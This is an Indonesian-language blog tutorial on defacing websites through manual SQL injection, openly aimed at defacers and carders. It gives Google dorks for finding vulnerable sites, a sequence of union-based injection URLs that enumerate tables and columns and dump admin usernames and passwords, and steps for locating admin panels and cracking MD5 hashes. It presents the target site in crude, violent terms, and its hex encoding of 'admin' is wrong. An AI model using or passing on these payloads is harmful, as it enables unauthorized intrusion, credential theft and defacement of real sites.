Deface Website dengan teknik SQL injection manual


ok guys langsung saja tutorial nya dari ane , ane juga belajar dari grup sebelah terima kasih web Gangters ^_^  tutorial nya

maaf gan kali ini tutorial nya kga vake gambar :V ane nulis aja ya ngirit kouta :V
ok tahap yang pertama :

1. kalian pasti tau dork itu buat apa?  para defacer dan carding  pasti tau ^_^ siapkan dulu dork ampuh kalian buat nyari si terget, kalau biasa nya dork umum yang sering ane pake ini :
     inurl:index.php?id= 
     inurl:Pageid=
     inurl:page.php?file=
dan masih banyak lagi , kembangkan sendiri gan ^_^

2. ketika pas kalian masukan dork ke google dan muncul banyak web disitu
klik salah satu web yang ingin agan di mainkan atau di perkosa ^_^

3. Tambahkan karakter ' pada akhir url'nya untuk mengetahui vulnerability'nya
Contoh : www.site.com/news.php?id=31'
contoh simple aje site.com cuma contoh loh gan

4. kalau muncul tulisan seperti "syntax error" berarti web tersebut vuln alias bisa kita deface
Contoh errornya : warning: mysql_fetch_array(): supplied argument is not a valid MYSQL result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line

5. Sekarang saatnya kita beraksi. Cari jumlah table yang ada pada database web tersebut dengan cara menambahkan karakter +order+by+1-- di belakang url
Contoh : www.site.com/news.php?id=31+order+by+1--

kalian coba satu persatu hingga muncul tulisan error.
Contoh : www.site.com/news.php?id=31+order+by+2--
www.site.com/news.php?id=31+order+by+3--
www.site.com/news.php?id=31+order+by+4--
www.site.com/news.php?id=31+order+by+5--
ane memisalkan jumlah table web ada 5 (errornya di 5)

6. Kemudian kita gunakan perintah union untuk mengeluarkan nomor yang nantinya kita gunakan. Tambahkan +union+select+1,2,3,4,5--
Contoh : www.site.com/news.php?id=31+union+select+1,2,3,4,5--
Saya memisalkan angka 4 yang keluar

7. Sekarang masukkan version() pada angka 4 untuk memaparkan version
Contoh : www.site.com/news.php?id=31+union+select+1,2,3,version(),5--

8. Kita munculkan nama - nama table yang ada pada web tersebut dengan memasukkan perintah table_name pada angka 3 dan perintah +from+information_schema.tables-- dibelakang url
Contoh : www.site.com/news.php?id=31+union+select+1,2,3,table_name,5+from+information_schema.tables--
Nantinya kita akan melihat nama nama table yang ada pada web

9. Kita lihat isi yang ada di dalam table tersebut dengan memasukkan perintah group_concat(table_name) pada angka 4 dan perintah +where+table_schema=database()-- di akhir url
Contoh : www.site.com/news.php?id=31+union+select+1,2,3,group_concat(table_name),5+from+information_schema.tables+where+table_schema=database()--

10. Selanjutnya kita keluarkan isi yang ada di table tersebut (column) dengan memasukkan perintah group_concat(column_name) pada angka 4 dan +from+information_schema.columns+where+table_name=0xHasilConvertTextTableAdmin-- di akhir url
Untuk langkah ke 10 ini silahkan anda convert terlebih dahulu
text nama table'nya ke hexadecimal [disini]
Jadi misalkan nama table'nya tadi admin maka jika di convert akan menjadi 71846D796E
Contoh : www.site.com/news.php?id=31+union+select+1,2,3,group_concat(column_name),5+from+information_schema.columns+where+table_name=0x71846D796E--
Nanti akan muncul column yang berisikan username dan password

11. Lalu kita lihat isi dari column yang kita temukan. ane misalkan nama tablenya adalah admin, dan isi dari table admin adalah column username & password. Maka masukkan perintah concat_ws(0x3a,"nama column yang ada di dalam table admin") pada angka 4 dan perintah +from+Admin-- di akhir url
Contoh :  www.site.com/news.php?id=31+union+select+1,2,3,concat_ws(0x3a,"username,password"),5+from+Admin--

12. Maka kita akan melihat username dan password admin dari web tersebut. Saatnya kita eksekusi.

13. Cari admin pagenya, biasanya dengan menambahkan tulisan berikut di akhir url web target.
/admin/ , /administrator/ , /webadmin/ , /adm/ , /webbase/
Contoh : www.site.com/admin/

Nah isikan username dan password yang tadi di dapat. Jika password berbentuk MD5 seperti b10adc3949ba59abbe56c057f20f883e, ente crack dulu [disini]

sekian tutorial nya
semoga bermanfaat bagi lu pada yang pengen deface dan ngecarding ^_^
Previous
Next Post »